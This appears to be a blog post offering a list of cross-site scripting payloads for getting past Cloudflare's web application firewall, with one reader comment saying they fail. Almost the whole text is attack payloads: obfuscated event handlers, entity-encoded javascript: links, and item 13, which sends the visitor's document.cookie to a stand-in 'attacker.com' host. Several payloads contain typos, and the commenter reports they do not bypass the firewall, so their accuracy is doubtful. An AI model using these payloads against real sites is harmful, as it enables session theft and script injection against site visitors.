CloudFlare XSS Bypass Payloads and Methods

1
Here is the list of XSS Payloads to Bypass  CloudFlare Firewall 


Method 1
Cloudflare #WAF Bypass
Just use {alert`1`} instead of alert(1).
Any #XSS vector will work
(except <script>).


Method 2
  1. <img src onerror=%26emsp;prompt`${document.domain}`>
  2. <--`<img/src=` onerror=confirm``> --!>
  3. “><svg/on</script>laod=alert>
  4. <a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(document.domain)&rpar;">X</a>
  5. <svg%0Aonauxclick=0;[1].some(confirm)//
  6. <a"/onclick=(confirm)()>Click Here!
  7. xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
  8. .</Scrpt/"%27--!>%20<Scrpt>%20confirm(1)%20</Scrpt>
  9. {` <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> ´}
  10. `payload´; %3Cimg src='null' onerror=alert('spyerror')%3E
  11. %27;%0d%0d});%0d{onerror=prompt}throw document.location</ScRipT//
  12. <a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(document.domain)&rpar;">X</a>
  13. XSS using location with cookie value payload : %3Cp%20style=overflow:auto;font-size:999px%20onscroll=x=location=%27http://attacker.com?cookie=%27+document.cookie%3EAAA%3Cx/id=y%3E%3C/p%3E
  14. <a"/onmouseover=(confirm)('clodflare-bypass-doskey_history')>click
  15. "/><frostnull+onmousemove/=alert`xss`+"<">frostnull<!--











1 Comments

  1. HackerMarch 14, 2022 at 10:54 PM

    CloudFlare is bypass i have check the all payload but cont bypass it

    ReplyDelete
Previous Post Next Post